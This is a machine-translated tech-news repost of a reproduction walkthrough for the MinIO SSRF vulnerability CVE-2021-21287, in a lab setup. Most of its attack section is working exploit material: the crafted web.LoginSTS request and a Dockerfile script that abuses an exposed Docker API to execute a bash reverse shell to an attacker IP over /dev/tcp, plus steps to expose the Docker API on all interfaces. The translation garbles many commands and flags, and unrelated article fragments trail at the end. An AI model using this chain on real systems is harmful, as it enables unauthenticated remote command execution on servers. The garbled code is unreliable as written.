In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article shows you how to analyze MinIO unauthorized SSRF vulnerability CVE-2021-21287. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.
MinIO unauthorized SSRF vulnerability (CVE-2021-21287)
I. brief introduction of loopholes
Due to improper design of LoginSTS interface in MinIO components, there is a server-side request forgery vulnerability.
Attackers can initiate server-side request forgery attacks by constructing URL. Attackers who successfully exploit this vulnerability can read, update internal resources or execute arbitrary commands by using functions on the server.
The vulnerability can be exploited remotely without user authentication.
Second, influence the version
MinIO
< RELEASE.2021-01-30T00-20-58Z 三、环境准备&漏洞复现 Docker 安装 minio: docker-compose.yml version: '3.7'services: minio1: image: minio/minio:RELEASE.2021-01-16T02-19-44Z volumes: - data1-1:/data1 - data1-2:/data2 ports: - "9000:9000" environment: MINIO_ACCESS_KEY: minio MINIO_SECRET_KEY: minio123 command: server http://minio{1...4}/data{1...2} healthcheck: test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"] interval: 30s timeout: 20s retries: 3## By default this config uses default local driver,## For custom volumes replace with volume driver configuration.volumes: data1-1: data1-2: 启动环境:Home page style:
Http://192.168.1.108:9000/minio/login
1. Verify SSRF
Specific packets:
POST / minio/webrpc HTTP/1.1Host: 192.168.1.104:1234User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79 {"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}
2. Ssrf rebounds shell
Put the file under the web service: index.php (apache)
Bounce the shell file:
DockerFile is as follows:
FROM alpine:3.13RUN apk add curl bash jqRUN set-ex & &\ {\ echo'#! / bin/bash';\ echo 'set-ex';\ echo' target= "http://192.168.1.108:2375"';\ echo 'jsons=$ (curl-s-XGET" ${target} / containers/json "| jq-r". [] | @ base64 ")' \ echo 'for item in ${jsons [@]}; do';\ echo' name=$ (echo $item | base64-d | jq-r ".Image")';\ echo'if [["$name" = = * "minio/minio" *]]; then';\ echo 'id=$ (echo $item | base64-d | jq-r ".ID")';\ echo 'break' \ echo 'fi';\ echo' done' \ echo 'execid=$ (curl-s-X POST "${target} / containers/$ {id} / exec"-H "Content-Type: application/json"-data-binary "{\" Cmd\ ": [\" bash\ ",\"-c\ ",\" bash-I > & / dev/tcp/192.168.1.104/888 0 > & 1\ "]}" | jq-r ".ID")' \ echo 'curl-s-X POST "${target} / exec/$ {execid} / start"-H "Content-Type: application/json"-data-binary "{}"';\} | bash
Specific operation packet:
POST / minio/webrpc HTTP/1.1Host: 192.168.1.104User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79 {"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}
A short video was recorded for a good presentation.
The process is boring and the wait is long: a BGM has been added
Video:
The result of operating the video:
Https://mp.weixin.qq.com/s/9OavrcdczSZDXler5IpiQQ
Note ⚠️:
The process was not written to it because its own Docker API was turned on.
Enable Docker API reference:
Open the configuration file to find
Open the configuration file to find ExecStart=/usr/bin/dockerd and change it to ExecStart=/usr/bin/dockerd-H tcp://0.0.0.0:2375-H unix:///var/run/docker.sock restart $systemctl daemon-reload$ systemctl restart docker
The above is how to analyze the MinIO unauthorized SSRF vulnerability CVE-2021-21287. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.